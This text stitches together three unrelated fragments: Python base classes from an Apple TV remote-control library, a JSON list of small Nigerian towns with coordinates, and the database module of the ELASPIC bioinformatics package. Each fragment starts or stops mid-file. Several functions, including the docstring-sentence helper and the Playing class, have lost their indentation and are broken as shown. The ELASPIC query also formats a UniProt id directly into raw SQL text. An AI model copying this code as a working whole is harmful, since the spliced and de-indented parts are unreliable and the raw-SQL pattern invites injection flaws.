        Set to None to remove active listener.
        """
        # Only a weak reference is stored, so the producer never keeps the
        # listener object alive on its own.
        self.__listener = None if target is None else weakref.ref(target)
def feature(index: int, name: str, doc: str) -> Callable[[ReturnType], ReturnType]:
    """Decorate functions and properties as a feature.

    Registers (name, doc) in the module-level feature table under the given
    index and returns the decorated object unchanged.

    Note: This is an internal function.
    """

    def _register(func: ReturnType) -> ReturnType:
        existing = _ALL_FEATURES.get(index)
        if existing is not None:
            # Every feature index must be globally unique.
            raise Exception(
                f"Index {index} collides between {name} and {existing}"
            )
        _ALL_FEATURES[index] = (name, doc)
        return func

    return _register
def _get_first_sentence_in_pydoc(obj):
doc = obj.__doc__
index = doc.find(".")
if index == -1:
# Here we have no leading . so return everything
return doc
# Try to find the first complete sentence and respect
# abbreviations correctly
match = re.findall(r"(.*\.[^A-Z]*)\.(?: [A-Z].*|)", doc)
if len(match) == 1:
return match[0]
return doc[0:index]
def retrieve_commands(obj: object):
    """Retrieve all commands and help texts from an API object.

    Public functions and properties (names not starting with an underscore
    and not called "listener") are returned as a mapping from member name to
    the first sentence of its docstring.
    """
    commands: Dict[str, str] = {}
    for name, member in obj.__dict__.items():
        if not (inspect.isfunction(member) or isinstance(member, property)):
            continue
        if name.startswith("_") or name == "listener":
            continue
        commands[name] = _get_first_sentence_in_pydoc(member)
    return commands
class BaseService:
    """Base class for protocol services.

    Carries the connection details (protocol, port, credentials and service
    properties) for one protocol supported by a device.
    """

    def __init__(
        self,
        identifier: Optional[str],
        protocol: Protocol,
        port: int,
        properties: Optional[Dict[str, str]],
    ) -> None:
        """Initialize a new BaseService."""
        self.__identifier = identifier
        self.protocol = protocol
        self.port = port
        self.credentials: Optional[str] = None
        self.properties = properties or {}

    @property
    def identifier(self) -> Optional[str]:
        """Return unique identifier associated with this service."""
        return self.__identifier

    def merge(self, other) -> None:
        """Merge with other service of same type.

        Credentials from the other service win when present; properties are
        merged with the other service's values taking precedence.
        """
        if other.credentials:
            self.credentials = other.credentials
        self.properties.update(other.properties)

    def __str__(self) -> str:
        """Return a string representation of this object."""
        protocol_name = convert.protocol_str(self.protocol)
        return "Protocol: {0}, Port: {1}, Credentials: {2}".format(
            protocol_name, self.port, self.credentials
        )
class PairingHandler(ABC):
    """Base class for API used to pair with an Apple TV.

    Concrete protocol implementations override the abstract members; the
    bodies here raise ``exceptions.NotSupportedError`` as a safety net.
    """

    def __init__(
        self, session_manager: net.ClientSessionManager, service: BaseService
    ) -> None:
        """Initialize a new instance of PairingHandler."""
        self.session_manager = session_manager
        self._service = service

    @property
    def service(self) -> BaseService:
        """Return service used for pairing."""
        return self._service

    async def close(self) -> None:
        """Call to free allocated resources after pairing."""
        # Closing the session manager releases the underlying HTTP session(s).
        await self.session_manager.close()

    @abstractmethod
    def pin(self, pin) -> None:
        """Pin code used for pairing."""
        raise exceptions.NotSupportedError()

    @property
    @abstractmethod
    def device_provides_pin(self) -> bool:
        """Return True if remote device presents PIN code, else False."""
        raise exceptions.NotSupportedError()

    @property
    @abstractmethod
    def has_paired(self) -> bool:
        """If a successful pairing has been performed.

        The value will be reset when stop() is called.
        """
        raise exceptions.NotSupportedError()

    @abstractmethod
    async def begin(self) -> None:
        """Start pairing process."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    async def finish(self) -> None:
        """Stop pairing process."""
        raise exceptions.NotSupportedError()
class RemoteControl(ABC):  # pylint: disable=too-many-public-methods
    """Base class for API used to control an Apple TV.

    Each command is decorated with ``@feature``, registering it in the global
    feature table under a unique index (indices must never be reused).
    Concrete protocol implementations override the abstract methods; the
    bodies here raise ``exceptions.NotSupportedError`` as a safety net.
    """

    # pylint: disable=invalid-name
    @abstractmethod
    @feature(0, "Up", "Up button on remote.")
    async def up(self, action: InputAction = InputAction.SingleTap) -> None:
        """Press key up."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(1, "Down", "Down button on remote.")
    async def down(self, action: InputAction = InputAction.SingleTap) -> None:
        """Press key down."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(2, "Left", "Left button on remote.")
    async def left(self, action: InputAction = InputAction.SingleTap) -> None:
        """Press key left."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(3, "Right", "Right button on remote.")
    async def right(self, action: InputAction = InputAction.SingleTap) -> None:
        """Press key right."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(4, "Play", "Start playing media.")
    async def play(self) -> None:
        """Press key play."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(5, "PlayPause", "Toggle between play/pause.")
    async def play_pause(self) -> None:
        """Toggle between play and pause."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(6, "Pause", "Pause playing media.")
    async def pause(self) -> None:
        """Press key pause."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(7, "Stop", "Stop playing media.")
    async def stop(self) -> None:
        """Press key stop."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(8, "Next", "Change to next item.")
    async def next(self) -> None:
        """Press key next."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(9, "Previous", "Change to previous item.")
    async def previous(self) -> None:
        """Press key previous."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(10, "Select", "Select current option.")
    async def select(self, action: InputAction = InputAction.SingleTap) -> None:
        """Press key select."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(11, "Menu", "Go back to previous menu.")
    async def menu(self, action: InputAction = InputAction.SingleTap) -> None:
        """Press key menu."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(12, "VolumeUp", "Increase volume.")
    async def volume_up(self) -> None:
        """Press key volume up."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(13, "VolumeDown", "Decrease volume.")
    async def volume_down(self) -> None:
        """Press key volume down."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(14, "Home", "Home/TV button.")
    async def home(self, action: InputAction = InputAction.SingleTap) -> None:
        """Press key home."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(
        15, "HomeHold", "Long-press home button (deprecated: use RemoteControl.home)."
    )
    async def home_hold(self) -> None:
        """Hold key home."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(16, "TopMenu", "Go to main menu.")
    async def top_menu(self) -> None:
        """Go to main menu (long press menu)."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(17, "Suspend", "Suspend device (deprecated; use Power.turn_off).")
    async def suspend(self) -> None:
        """Suspend the device."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(18, "WakeUp", "Wake up device (deprecated; use Power.turn_on).")
    async def wakeup(self) -> None:
        """Wake up the device."""
        raise exceptions.NotSupportedError()

    # NOTE: indices 36/37 are out of sequence here because lower indices were
    # already taken when these features were added.
    @abstractmethod
    @feature(
        36,
        "SkipForward",
        "Skip forward a time interval.",
    )
    async def skip_forward(self) -> None:
        """Skip forward a time interval.

        Skip interval is typically 15-30s, but is decided by the app.
        """
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(37, "SkipBackward", "Skip backwards a time interval.")
    async def skip_backward(self) -> None:
        """Skip backwards a time interval.

        Skip interval is typically 15-30s, but is decided by the app.
        """
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(19, "SetPosition", "Seek to position.")
    async def set_position(self, pos: int) -> None:
        """Seek in the current playing media."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(20, "SetShuffle", "Change shuffle state.")
    async def set_shuffle(self, shuffle_state: const.ShuffleState) -> None:
        """Change shuffle mode to on or off."""
        raise exceptions.NotSupportedError()

    @abstractmethod
    @feature(21, "SetRepeat", "Change repeat state.")
    async def set_repeat(self, repeat_state: const.RepeatState) -> None:
        """Change repeat state."""
        raise exceptions.NotSupportedError()
class Playing(ABC):
"""Base class for retrieving what is currently playing."""
def __str__(self) -> str:
"""Convert this playing object to a readable string."""
output = []
output.append(
" Media type: {0}".format(convert.media_type_str(self.media_type))
)
output.append(
"Device state: {0}".format(convert.device_state_str(self.device_state))
)
if self.title is not None:
output.append(" Title: {0}".format(self.title))
if self.artist is not None:
output.append(" Artist: {0}".format(self.artist))
if self.album is not None:
output.append(" Album: {0}".format(self.album))
if self.genre is not None:
output.append(" Genre: {0}".format(self.genre))
position = self.position
total_time = self.total_time
if position is not None and total_time is not None and total_time != 0:
output.append(
" Position: {0}/{1}s ({2:.1%})".format(
position, total_time, float(position) / float(total_time)
)
)
elif position is not None and position != 0:
output.append(" Position: {0}s".format(position))
elif total_time is not None and position != 0:
output.append(" Total time: {0}s".format(total_time))
if self.repeat is | |
"iso2": "NG",
"admin_name": "Edo",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Onueke",
"lat": "6.1554",
"lng": "8.0374",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ebonyi",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ile-Oluji",
"lat": "7.2131",
"lng": "4.8690",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ondo",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ughelli",
"lat": "5.4896",
"lng": "6.0041",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Delta",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Sabon Wuse",
"lat": "9.3342",
"lng": "7.2611",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Niger",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Tsanyawa",
"lat": "12.2956",
"lng": "7.9865",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Warawa",
"lat": "11.8662",
"lng": "8.7015",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Okopedi",
"lat": "4.8492",
"lng": "8.1256",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "<NAME>",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ikot Ibritam",
"lat": "4.8117",
"lng": "7.6140",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "<NAME>",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Oghara",
"lat": "5.9355",
"lng": "5.6661",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Delta",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Oke-Agbe",
"lat": "7.6431",
"lng": "5.7594",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ondo",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Bindawa",
"lat": "12.6699",
"lng": "7.8087",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Katsina",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Karaye",
"lat": "11.7836",
"lng": "8.0150",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Rano",
"lat": "11.5568",
"lng": "8.5806",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Bunkure",
"lat": "11.6992",
"lng": "8.5413",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Kibiya",
"lat": "11.5280",
"lng": "8.6611",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Afam",
"lat": "4.7900",
"lng": "7.3119",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Rivers",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Upenekang",
"lat": "4.5706",
"lng": "7.9795",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "<NAME>",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Isara",
"lat": "6.9890",
"lng": "3.6824",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ogun",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Owa-Oyibu",
"lat": "6.1827",
"lng": "6.1990",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Delta",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Garko",
"lat": "11.6497",
"lng": "8.8033",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Kwoi",
"lat": "9.4574",
"lng": "8.0068",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kaduna",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ezzamgbo",
"lat": "6.3989",
"lng": "7.9616",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ebonyi",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Nkwoagu Isuochi",
"lat": "5.9912",
"lng": "7.3944",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Abia",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ode-Ekiti",
"lat": "7.6481",
"lng": "5.5495",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ekiti",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Hunkuyi",
"lat": "11.2668",
"lng": "7.6492",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kaduna",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Isua",
"lat": "7.4536",
"lng": "5.9105",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ondo",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Oleh",
"lat": "5.4619",
"lng": "6.2062",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Delta",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Okeho",
"lat": "8.0345",
"lng": "3.3476",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Oyo",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ikot Nakanda",
"lat": "4.8843",
"lng": "8.4838",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "<NAME>",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Takai",
"lat": "11.5757",
"lng": "9.1088",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Igede-Ekiti",
"lat": "7.6685",
"lng": "5.1263",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ekiti",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Uromi",
"lat": "6.7097",
"lng": "6.3298",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Edo",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ejigbo",
"lat": "7.9029",
"lng": "4.3142",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Osun",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Patani",
"lat": "5.2288",
"lng": "6.1914",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Delta",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Mbalano",
"lat": "5.7343",
"lng": "7.5024",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Abia",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Okehi",
"lat": "5.1390",
"lng": "7.1392",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Rivers",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Eberi",
"lat": "5.0912",
"lng": "7.2337",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Rivers",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ise-Ekiti",
"lat": "7.4648",
"lng": "5.4233",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ekiti",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Dandume",
"lat": "11.4588",
"lng": "7.1260",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Katsina",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ijebu-Igbo",
"lat": "6.9720",
"lng": "3.9994",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ogun",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Umuguma",
"lat": "5.4678",
"lng": "6.9659",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Imo",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Kiru",
"lat": "11.7021",
"lng": "8.1348",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Abuochiche",
"lat": "6.6913",
"lng": "8.9434",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "<NAME>",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Oke-Ila",
"lat": "7.9493",
"lng": "4.9887",
"country": "Nigeria", | |
<filename>elaspic/elaspic_database.py
import datetime
import logging
import os
import os.path as op
import shlex
import shutil
import subprocess
from contextlib import contextmanager
import pandas as pd
import six
import sqlalchemy as sa
from elaspic import conf, errors, helper
from elaspic.elaspic_database_tables import (
Base,
UniprotDomain,
UniprotDomainModel,
UniprotDomainMutation,
UniprotDomainPair,
UniprotDomainPairModel,
UniprotDomainPairMutation,
)
from elaspic.kmtools_legacy import make_connection_string, parse_connection_string
logger = logging.getLogger(__name__)
def enable_sqlite_foreign_key_checks(engine):
    """Attach connect-time PRAGMA listeners to an SQLite engine.

    Every new DBAPI connection gets, in order:

    - ``foreign_keys=ON`` so foreign key constraints are enforced,
    - ``journal_mode=WAL`` so reads can occur simultaneously with writes,
    - ``busy_timeout=60000`` (60 s) so lock contention waits instead of
      failing immediately.

    Parameters
    ----------
    engine
        SQLAlchemy engine connected to an SQLite database.
    """
    from sqlalchemy import event

    # The original code defined all three listeners under the same name,
    # shadowing each previous one; distinct names keep each registration
    # explicit while preserving the registration (and firing) order.

    def _enable_foreign_keys(dbapi_con, con_record):
        # Enable foreign key constraints
        dbapi_con.execute("pragma foreign_keys=ON")

    def _enable_wal_journal(dbapi_con, con_record):
        # Enable the write-ahead lock so that reads can occur simultaneously
        # with writes
        dbapi_con.execute("PRAGMA journal_mode=WAL")

    def _set_busy_timeout(dbapi_con, con_record):
        # Set a longer timeout duration
        dbapi_con.execute("pragma busy_timeout=60000")  # 60 sec

    event.listen(engine, "connect", _enable_foreign_keys)
    event.listen(engine, "connect", _enable_wal_journal)
    event.listen(engine, "connect", _set_busy_timeout)
# Session factory used for all future queries; it is (re)bound to the active
# engine in MyDatabase.configure_session().
# `expire_on_commit=False` so that loaded table objects remain usable even
# after the session closes.
Session = sa.orm.sessionmaker(expire_on_commit=False)
# Session = sa.orm.scoped_session(sa.orm.sessionmaker(expire_on_commit=False))
class MyDatabase(object):
""""""
def __init__(self, echo=False):
self.engine = self.get_engine(echo=echo)
self.configure_session()
logger.info(
"Using precalculated data from the following folder: '{archive_dir}'".format(
**conf.CONFIGS
)
)
def get_engine(self, echo=False):
"""Get an SQLAlchemy engine that can be used to connect to the database."""
sa_opts = {
"echo": echo,
}
if conf.CONFIGS["db_type"] == "sqlite":
sa_opts["isolation_level"] = "READ UNCOMMITTED"
elif conf.CONFIGS["db_type"] == "mysql":
sa_opts["isolation_level"] = "READ UNCOMMITTED"
sa_opts["pool_size"] = 1
sa_opts["pool_recycle"] = 3600
elif conf.CONFIGS["db_type"] == "postgresql":
sa_opts["pool_size"] = 1
sa_opts["pool_recycle"] = 3600
else:
raise Exception("Unsupported 'db_type': '{}'!".format(conf.CONFIGS["db_type"]))
engine = sa.create_engine(conf.CONFIGS["connection_string"], **sa_opts)
if conf.CONFIGS["db_type"] == "sqlite":
enable_sqlite_foreign_key_checks(engine)
logger.info("Opened database connection using engine: '{}'".format(engine))
return engine
def configure_session(self):
"""
Configure the Session class to use the current engine.
`autocommit` and `autoflush` are enabled for the `sqlite` database in order to improve
performance.
"""
global Session
if conf.CONFIGS["db_type"] == "sqlite":
autocommit = False # True
autoflush = True # True
# retry_on_failure = True
elif conf.CONFIGS["db_type"] in ["postgresql", "mysql"]:
autocommit = False
autoflush = True
# retry_on_failure = True
Session.configure(bind=self.engine, autocommit=autocommit, autoflush=autoflush)
@contextmanager
def session_scope(self):
"""Provide a transactional scope around a series of operations.
Enables the following construct: ``with self.session_scope() as session:``.
"""
session = Session()
try:
yield session
if not conf.CONFIGS["db_is_immutable"]:
session.commit()
except:
if not conf.CONFIGS["db_is_immutable"]:
session.rollback()
raise
finally:
session.expunge_all()
session.close()
def create_database_schema(self, db_schema):
"""Create ELASPIC database schema."""
# Create engine without a default schema
engine = sa.create_engine(
make_connection_string(
**{
**parse_connection_string(conf.CONFIGS["connection_string"]),
"db_schema": "",
}
)
)
sql_command = "CREATE SCHEMA IF NOT EXISTS `{}`;".format(db_schema)
logger.debug("sql_command: '{}'".format(sql_command))
engine.execute(sql_command)
def drop_database_schema(self, db_schema):
"""Drop ELASPIC database schema."""
# Create engine without a default schema
engine = sa.create_engine(
make_connection_string(
**{
**parse_connection_string(conf.CONFIGS["connection_string"]),
"db_schema": "",
}
)
)
sql_command = "DROP SCHEMA IF EXISTS {};".format(db_schema)
logger.debug("sql_command: '{}'".format(sql_command))
engine.execute(sql_command)
def create_database_tables(self, drop_schema=False):
"""Create a new database in the schema specified by the ``schema_version`` global variable.
If ``clear_schema == True``, remove all the tables in the schema first.
.. warning::
Using this function with an existing database can lead to loss of data.
Make sure that you know what you are doing!
Parameters
----------
clear_schema : bool
Whether or not to delete all tables in the database schema before creating new tables.
keep_uniprot_sequence : bool
Whether or not to keep the `uniprot_sequence` table.
Only relevant if `clear_schema` is `True`.
"""
if drop_schema and self.engine.name in ["mysql"]:
self.drop_database_schema(conf.CONFIGS["db_schema"])
self.create_database_schema(conf.CONFIGS["db_schema"])
# Create all tables, creating schema as neccessary
for table in Base.metadata.sorted_tables:
table.create(self.engine, checkfirst=True)
logger.debug("Database tables were created successfully.")
def delete_database_tables(self, drop_schema=False, drop_uniprot_sequence=False):
    """Delete all ELASPIC tables, or the entire schema where supported.

    Parameters
    ----------
    drop_schema : bool
        Whether or not to drop the entire schema instead of removing tables
        one by one.  Supported for sqlite (removes the database file) and
        mysql; ignored with a log message for other backends.
    drop_uniprot_sequence : bool
        Whether or not to also drop the `uniprot_sequence` table when
        removing tables one by one.
    """
    if drop_schema and conf.CONFIGS["db_type"] == "sqlite":
        # For sqlite, "dropping the schema" means deleting the database file.
        os.remove(self.engine.url.database)
        logger.info("Successfully removed database schema: {db_schema}".format(**conf.CONFIGS))
    elif drop_schema and conf.CONFIGS["db_type"] == "mysql":
        self.engine.execute("drop schema {db_schema};".format(**conf.CONFIGS))
        logger.info("Successfully removed database schema: {db_schema}".format(**conf.CONFIGS))
    else:
        if drop_schema:
            logger.info(
                "Drop schema is not supported for %s database...",
                conf.CONFIGS["db_type"],
            )
        # Remove tables one by one, in reverse dependency order so that
        # children are dropped before their parents.
        for table in reversed(Base.metadata.sorted_tables):
            if table.name != "uniprot_sequence" or drop_uniprot_sequence:
                logger.debug("Dropping table %s...", table.name)
                # BUGFIX: this statement was previously executed twice in a row.
                self.engine.execute("DROP TABLE IF EXISTS {};".format(table.name))
# %%
# Shell-command template for bulk-loading a .tsv file into MySQL via the
# `mysql` client ({sql_command} is filled in from `mysql_command_template`).
mysql_load_table_template = (
    r"""mysql --local-infile --host={db_url} --user={db_username} --password={db_password} """
    r"""{table_db_schema} -e "{sql_command}" """
)
# Shell-command template for bulk-loading a .tsv file into PostgreSQL via
# `psql` ({sql_command} is filled in from `psql_command_template`).
psql_load_table_template = (
    r"""PGPASSWORD={db_password} psql -h {db_url} -p {db_port} -U {db_username} """
    r"""-d {db_database} -c "{sql_command}" """
)
# Need to double up on '\\'
# SQL statement executed by the MySQL client to load one table.
mysql_command_template = (
    r"""load data local infile '{table_folder}/{table_name}.tsv' """
    r"""into table {table_db_schema}.{table_name} """
    r"""fields terminated by '\t' escaped by '\\\\' lines terminated by '\n'; """
)
# psql meta-command executed by the PostgreSQL client to load one table.
psql_command_template = (
    r"""\\copy {table_db_schema}.{table_name} """
    r"""from '{table_folder}/{table_name}.tsv' """
    r"""with csv delimiter E'\t' null '\N' escape '\\'; """
)
# Location of the .tsv file loaded into SQLite (read with pandas).
sqlite_table_filename = "{table_folder}/{table_name}.tsv"
def _load_data_into_sqlite(self, configs):
    """Append rows from a .tsv file to the matching table of an SQLite database."""
    table_name = configs["table_name"]
    # Column names come from the SQLAlchemy metadata for the target table.
    column_names = Base.metadata.tables[table_name].columns.keys()
    table_df = pd.read_csv(
        self.sqlite_table_filename.format(**configs),
        sep="\t",
        na_values="\\N",
        # escapechar='\\', # escapes the `na_values` character and causes problems
        names=column_names,
    )
    table_df.to_sql(table_name, self.engine, index=False, if_exists="append")
def _run_create_table_system_command(self, system_command):
    """Run *system_command* in a subprocess, raising ``CalledProcessError`` on failure."""
    if conf.CONFIGS["debug"]:
        logger.debug(system_command)
    argv = shlex.split(system_command)
    subprocess.run(argv, check=True)
def copy_table_to_db(self, table_name, table_folder):
    """Copy data from a ``.tsv`` file to a table in the database."""
    opts = conf.CONFIGS.copy()
    opts["table_name"] = table_name
    opts["table_folder"] = table_folder
    logger.info("Copying '{table_name}' to '{db_type}' database...".format(**opts))
    db_type = opts["db_type"]
    if db_type == "sqlite":
        # SQLite has no bulk-load client; go through pandas instead.
        self._load_data_into_sqlite(opts)
    elif db_type == "mysql":
        opts["table_db_schema"] = opts["db_schema"]
        opts["sql_command"] = self.mysql_command_template.format(**opts)
        self._run_create_table_system_command(self.mysql_load_table_template.format(**opts))
    elif db_type == "postgresql":
        opts["table_db_schema"] = opts["db_schema"]
        opts["sql_command"] = self.psql_command_template.format(**opts)
        self._run_create_table_system_command(self.psql_load_table_template.format(**opts))
    else:
        raise Exception("Unsupported database type: '{}'".format(opts["db_type"]))
@helper.retry_database
def get_rows_by_ids(self, row_object, row_object_identifiers, row_object_identifier_values):
    """Get the rows from the table `row_object` identified by keys `row_object_identifiers`.

    Parameters
    ----------
    row_object
        The mapped ORM class to query.
    row_object_identifiers : list
        Column attributes to filter on (at most three).
    row_object_identifier_values : list
        Values matching `row_object_identifiers`, position by position.
    """
    with self.session_scope() as session:
        if len(row_object_identifiers) != len(row_object_identifier_values):
            raise Exception(
                "The number of identifiers and the number of identifier "
                "values must be the same."
            )
        if not row_object_identifiers:
            # BUGFIX: previously an empty identifier list fell through every
            # branch and raised a confusing `NameError` at the return.
            raise Exception("At least one identifier must be provided.")
        if len(row_object_identifiers) > 3:
            raise Exception(
                "Too many identifiers provided. The function is hard-coded "
                "to handle at most three identifiers."
            )
        # Apply one equality filter per (identifier, value) pair instead of
        # duplicating the whole query for each supported identifier count.
        query = session.query(row_object)
        for identifier, value in zip(row_object_identifiers, row_object_identifier_values):
            query = query.filter(identifier == value)
        return query.all()
@helper.retry_database
def get_uniprot_domain(self, uniprot_id, copy_data=False):
    """Return up to 100 `UniprotDomain` rows for the given uniprot id.

    Domains without a structural template are filtered out of the result.
    When `copy_data` is truthy, precalculated Provean data and homology
    models are copied from the archive; on failure the corresponding
    filename attributes are cleared so downstream code can recalculate.
    """
    with self.session_scope() as session:
        uniprot_domains = (
            session.query(UniprotDomain)
            .filter(UniprotDomain.uniprot_id == uniprot_id)
            # .options(sa.orm.joinedload('template').joinedload('model'))
            # .options(sa.orm.joinedload('template', innerjoin=True))
            .limit(100)
            .all()
        )
        archive_dir = conf.CONFIGS["archive_dir"]
        archive_type = conf.CONFIGS["archive_type"]
        # Iterate with an explicit index because items may be deleted from
        # the list while iterating.
        d_idx = 0
        while d_idx < len(uniprot_domains):
            d = uniprot_domains[d_idx]
            if not d.template:
                logger.debug(
                    "Skipping uniprot domain with id {} because it does not "
                    "have a structural template...".format(d.uniprot_domain_id)
                )
                del uniprot_domains[d_idx]
                continue
            # Copy precalculated Provean data
            if copy_data:
                try:
                    self._copy_provean(d, archive_dir, archive_type)
                except subprocess.CalledProcessError as e:
                    logger.error(e)
                    logger.error("Failed to copy provean supporting set!")
                    # Clearing the filename marks Provean data as missing.
                    d.uniprot_sequence.provean.provean_supset_filename = ""
            # Copy precalculated homology models
            if copy_data:
                try:
                    self._copy_uniprot_domain_data(d, d.path_to_data, archive_dir, archive_type)
                except subprocess.CalledProcessError as e:
                    logger.error(e)
                    logger.error("Failed to copy the domain alignment and / or homology model!")
                    d.template.model.alignment_filename = None
                    d.template.model.model_filename = None
            d_idx += 1
        return uniprot_domains
@helper.retry_database
def get_uniprot_domain_pair(self, uniprot_id, copy_data=False, uniprot_domain_pair_ids=[]):
    """Return up to 100 `UniprotDomainPair` rows involving `uniprot_id`.

    Pairs without a structural template are filtered out.  When
    `copy_data` is truthy, precalculated Provean data and homology models
    are copied from the archive.

    NOTE(review): `uniprot_domain_pair_ids=[]` is a mutable default
    argument; it is never mutated here, but a `None` default would be safer.
    """
    with self.session_scope() as session:
        uniprot_domain_pairs_query = session.query(UniprotDomainPair).filter(
            sa.or_(
                sa.text("uniprot_id_1='{}'".format(uniprot_id)),
                sa.text("uniprot_id_2='{}'".format(uniprot_id)),
            )
        )
        if uniprot_domain_pair_ids:
            uniprot_domain_pairs_query = uniprot_domain_pairs_query.filter(
                UniprotDomainPair.uniprot_domain_pair_id.in_(uniprot_domain_pair_ids)
            )
        uniprot_domain_pairs = (
            uniprot_domain_pairs_query
            # .options(sa.orm.joinedload('template', innerjoin=True).joinedload('model'))
            # .options(sa.orm.joinedload('template', innerjoin=True))
            .limit(100).all()
        )
        # The above SQL query may result in duplicates if we have homodimers.
        # So we need to remove possible dimers.
